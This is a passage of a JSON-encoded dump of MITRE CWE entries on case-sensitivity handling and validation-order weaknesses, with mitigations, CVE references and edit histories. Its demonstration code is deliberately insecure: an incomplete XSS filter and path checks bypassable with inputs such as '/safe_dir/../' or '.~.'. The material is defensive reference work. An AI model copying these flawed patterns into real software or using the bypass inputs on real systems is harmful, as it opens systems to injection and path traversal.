Encoding)"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"468"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"72"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"URL Encoding (Hex Encoding)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle URL Encoding (Hex Encoding)","attr":{"@_Date":"2010-12-13"}}]}},"178":{"attr":{"@_ID":"178","@_Name":"Improper Handling of Case Sensitivity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results.","Extended_Description":{"xhtml:p":"Improperly handled case sensitive data can lead to several possible consequences, including:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["case-insensitive passwords reducing the size of the key space, making brute force attacks easier","bypassing filters or access controls using alternate names","multiple interpretation errors using alternate names."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-141"},"Intro_Text":"In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String preventXSS(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code only works when the \\"script\\" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as \\"SCRIPT\\" or \\"ScRiPt\\" will not be neutralized by this method, allowing an XSS attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0499","Description":"Application server allows attackers to bypass execution of a jsp page and read the source code using an upper case JSP extension in the request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0499"},{"Reference":"CVE-2000-0497","Description":"The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0497"},{"Reference":"CVE-2000-0498","Description":"The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0498"},{"Reference":"CVE-2001-0766","Description":"A URL that contains some characters whose case is not matched by the server\'s filters may bypass access restrictions because the case-insensitive file system will then handle the request after it bypasses the case sensitive filter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0766"},{"Reference":"CVE-2001-0795","Description":"Server allows remote attackers to obtain source code of CGI scripts via URLs that contain MS-DOS conventions such as (1) upper case letters or (2) 8.3 file names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2001-1238","Description":"Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238"},{"Reference":"CVE-2003-0411","Description":"chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411"},{"Reference":"CVE-2002-0485","Description":"Leads to interpretation error","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485"},{"Reference":"CVE-1999-0239","Description":"Directories may be listed because lower case web requests are not properly handled by the server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0239"},{"Reference":"CVE-2005-0269","Description":"File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269"},{"Reference":"CVE-2004-1083","Description":"Web server restricts access to files in a case sensitive manner, but the filesystem accesses files in a case insensitive manner, which allows remote attackers to read privileged files using alternate capitalization.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1083"},{"Reference":"CVE-2002-2119","Description":"Case insensitive passwords lead to search space reduction.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2119"},{"Reference":"CVE-2004-2214","Description":"HTTP server allows bypass of access restrictions using URIs with mixed case.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214"},{"Reference":"CVE-2004-2154","Description":"Mixed upper/lowercase allows bypass of ACLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2154"},{"Reference":"CVE-2005-4509","Description":"Bypass malicious script detection by using tokens that aren\'t case sensitive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4509"},{"Reference":"CVE-2002-1820","Description":"Mixed case problem allows \\"admin\\" to have \\"Admin\\" rights (alternate name property).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1820"},{"Reference":"CVE-2007-3365","Description":"Chain: uppercase file extensions causes web server to return script source code instead of executing the script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Case Sensitivity (lowercase, uppercase, mixed case)"}},"Notes":{"Note":{"#text":"These are probably under-studied in Windows and Mac environments, where file names are case-insensitive and thus are subject to equivalence manipulations involving case.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Functional_Areas, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Case Sensitivity (Lowercase, Uppercase, Mixed Case)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Case Sensitivity","attr":{"@_Date":"2010-12-13"}}]}},"179":{"attr":{"@_ID":"179","@_Name":"Incorrect Behavior Order: Early Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software validates input before applying protection mechanisms that modify the input, which could allow an attacker to bypass the validation via dangerous inputs that only arise after the modification.","Extended_Description":"Software needs to validate data at the proper time, after data has been canonicalized and cleansed. Early validation is susceptible to various manipulations that result in dangerous inputs that are produced by canonicalization and cleansing.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Since early validation errors usually arise from improperly implemented defensive mechanisms, it is likely that these will be introduced more frequently as secure programming becomes implemented more widely."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Bypass Protection Mechanism","Execute Unauthorized Code or Commands"],"Note":"An attacker could include dangerous input that bypasses validation protection mechanisms which can be used to launch various attacks including injection attacks, execute arbitrary code or cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-35"},"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith(\\"/safe_dir/\\")){}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of \\"/safe_dir/../\\" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just \\"/\\".","To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue."]},{"attr":{"@_Demonstrative_Example_ID":"DX-36"},"Intro_Text":"This script creates a subdirectory within a user directory and sets the user as the owner.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createDir($userName,$dirName){}","xhtml:div":{"#text":"$userDir = \'/users/\'. $userName;if(strpos($dirName,\'..\') !== false){}$dirName = str_replace(\'~\',\'\',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"echo \'Directory name contains invalid sequence\';return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"//filter out \'~\' because other scripts identify user directories by this prefix"}}},"Body_Text":"While the script attempts to screen for \'..\' sequences, an attacker can submit a directory path including \\".~.\\", which will then become \\"..\\" after the filtering step. This allows a Path Traversal (CWE-21) attack to occur."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Product allows remote attackers to view restricted files via an HTTP request containing a \\"*\\" (wildcard or asterisk) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2003-0332","Description":"Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332"},{"Reference":"CVE-2002-0802","Description":"Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802"},{"Reference":"CVE-2000-0191","Description":"Overlaps \\"fakechild/../realchild\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2004-2363","Description":"Product checks URI for \\"&lt;\\" and other literal characters, but does it before hex decoding the URI, so \\"%3E\\" and other sequences are allowed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363"},{"Reference":"CVE-2002-0934","Description":"Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934"},{"Reference":"CVE-2003-0282","Description":"Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Early Validation Errors"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"71"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Escaping Metacharacters&#34;, Page 439"}}},"Notes":{"Note":{"#text":"These errors are mostly reported in path traversal vulnerabilities, but the concept applies whenever validation occurs.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Early Validation Errors","attr":{"@_Date":"2008-04-11"}}}},"180":{"attr":{"@_ID":"180","@_Name":"Incorrect Behavior Order: Validate Before Canonicalize","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software validates input before it is canonicalized, which prevents the software from detecting data that becomes invalid after the canonicalization step.","Extended_Description":"This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"179","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-35"},"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith(\\"/safe_dir/\\")){}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of \\"/safe_dir/../\\" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just \\"/\\".","To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Product allows remote attackers to view restricted files via an HTTP request containing a \\"*\\" (wildcard or asterisk) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2003-0332","Description":"Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332"},{"Reference":"CVE-2002-0802","Description":"Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802"},{"Reference":"CVE-2000-0191","Description":"Overlaps \\"fakechild/../realchild\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2004-2363","Description":"Product checks URI for \\"&lt;\\" and other literal characters, but does it before hex decoding the URI, so \\"%3E\\" and other sequences are allowed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Validate-Before-Canonicalize"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":{"#text":"This overlaps other categories.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Validate-Before-Canonicalize","attr":{"@_Date":"2008-04-11"}}}},"181":{"attr":{"@_ID":"181","@_Name":"Incorrect Behavior Order: Validate Before Filter","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software validates data before it has been filtered, which prevents the software from detecting data that becomes invalid after the filtering step.","Extended_Description":"This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"179","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Validate-before-cleanse"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Architecture and Design"],"Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being filtered."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-36"},"Intro_Text":"This script creates a subdirectory within a user directory and sets the user as the 